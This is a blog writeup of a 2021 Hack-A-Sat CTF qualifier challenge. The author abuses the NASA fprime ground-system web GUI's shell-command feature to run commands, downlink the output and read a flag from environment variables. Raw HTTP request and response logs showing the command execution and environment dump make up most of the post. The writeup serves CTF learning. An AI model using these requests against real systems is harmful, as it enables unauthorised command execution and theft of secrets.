2021 Hack-A-Sat DEFCON Space Security Challenge CTF Qualifiers Writeup - Grade F Prime Beef

-
Welcome back to another year of HaS writeups.

Grade F Prime Beef


"Exploit the system, get the passcode, retrieve the flag."

Connecting to the target system and providing the token gave us a web gui for fprime (and a shell, but it wasn't required), a NASA open source framework for flight software.

This looks like an interesting framework to explore! But we're doing a CTF and we need the flag.

Helpfully, we have RCE built in as a feature: github

So we can send it a command, dump the output to a file, and downlink it (timestamps are messed up as I'm recovering this from burp logs and cbb finding the exact flow):

PUT /commands/fileManager.ShellCommand?_no_cache=...&session=... HTTP/1.1
Host: 18.222.149.133:11782
Content-Length: 68
Content-Type: application/json
Accept: */*
Origin: http://18.222.149.133:11782
Referer: http://18.222.149.133:11782/
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Connection: close

{"key":4276996862,"arguments":["ls -lah /home/space","/tmp/output"]}

HTTP/1.0 200 OK
Content-Type: application/json
Content-Length: 23
Server: Werkzeug/2.0.1 Python/3.7.3
Date: Sun, 27 Jun 2021 06:09:12 GMT

{"message": "success"}

PUT /commands/fileDownlink.SendFile?_no_cache=...&session=... HTTP/1.1
Host: 18.222.149.133:11782
Content-Length: 53
Content-Type: application/json
Accept: */*
Origin: http://18.222.149.133:11782
Referer: http://18.222.149.133:11782/
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Connection: close

{"key":4276996862,"arguments":["/tmp/output","asdf"]}

HTTP/1.0 200 OK
Content-Type: application/json
Content-Length: 23
Server: Werkzeug/2.0.1 Python/3.7.3
Date: Sun, 27 Jun 2021 06:04:28 GMT

{"message": "success"}


GET /download/files/asdf HTTP/1.1
Host: 18.222.149.133:11782
Referer: http://18.222.149.133:11782/
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Connection: close


HTTP/1.0 200 OK
Content-Disposition: attachment; filename=asdf
Content-Length: 412
Content-Type: application/octet-stream
Last-Modified: Sun, 27 Jun 2021 06:09:34 GMT
Cache-Control: public, max-age=43200
Expires: Sun, 27 Jun 2021 18:09:36 GMT
ETag: "1624774174.3702145-412-2055932307"
Date: Sun, 27 Jun 2021 06:09:36 GMT
Server: Werkzeug/2.0.1 Python/3.7.3

uid=1000(space) gid=1000(space) groups=1000(space)
uid=1000(space) gid=1000(space) groups=1000(space)
total 28K
drwxr-x--- 1 space space 4.0K Jun 26 21:57 .
drwxr-xr-x 1 root  root  4.0K Jun 26 21:57 ..
-rw-r----- 1 space space  220 Apr 18  2019 .bash_logout
-rw-r----- 1 space space 3.5K Apr 18  2019 .bashrc
-rw-r----- 1 space space  807 Apr 18  2019 .profile
drwxr-xr-x 1 space space 4.0K Jun 26 21:57 fprime

Calling 'env' was enough to retrieve the flag: 
MAIL=/var/mail/space
USER=space
SHLVL=0
HOME=/home/space
OLDPWD=/home/space
LOGNAME=space
_=./satellite.exe
PATH=/usr/local/bin:/usr/bin:/bin:/usr/local/games:/usr/games
SAT_FLAG=ThisIsNotTheFlagYouAreLookingFor
SHELL=/bin/bash
PWD=/home/space/fprime
FLAG=flag{yankee...}

Was this a mistake?
This challenge was in the RE category, and had a binary, /home/space/fprime/satellite.exe - which we obtained, noted it was getting the flag from env vars, and bypassed the requirement to get the passcode from the binary. Perhaps they didn't mean to leave the RCE feature enabled? It likely could have been copied out of /proc/pid/environ as well?

Comments

Post a Comment

Popular posts from this blog

2020 Hack-A-Sat DEFCON Space Security Challenge CTF Qualifiers 2020 - Part 1

-
Image
Preface This year the US Air Force teamed up with DoD's Digital Service and DEFCON's Aerospace village to build a CTF - the first of it's kind - to hack satellites. I joined with some colleagues and their CTF team to get our numbers around half a dozen. We missed the top ten by ~50 points, which was disappointing, but shows the quality of the teams we were up against and that the tournament attracted. Since joining a Bay Area tech company, I haven't found much time or mental space for CTFs or bug bounties. But aerospace has a special place in my heart, and with numerous commercial launch companies massively driving down the costs to get satellites up, understanding the frameworks, communication protocols, physics, tools, history etc. is going to be super important. Before I get to the goods, a hat tip to the USAF & DoD for getting behind this. Satellites are going to become increasingly important in our day-to-day lives, and investing in bringing the security commun...
Read more

2020 Hack-A-Sat DEFCON Space Security Challenge CTF Qualifiers 2020 - Part 2

-
Image
The Magic Bus Challenge This challenge involved analyzing a fairly simple bus protocol emerging from a modem looking thing upon connecting to the target port provided. From the challenge description: There's a very busy bus we've tapped a port onto, surely there is some juicy information hidden in the device memory... somewhere… Upon connecting netcat to the provided hostname and port, we're provided with a slowly scrolling stream of ASCII text. If you don't send anything, you end up with an output looking similar to this: Scrolling in this sort of fashion: A few observations: On each connection, we consistently see it starting with a "^3a", and ending in a "+." Other than +, ^ and ., we've purely got hex characters other than... ... the NO CARRIER message at the end +++ and NO CARRIER are session commands from the Hayes command set , usually used for modem control (commonly referred to as AT commands) Some experimen...
Read more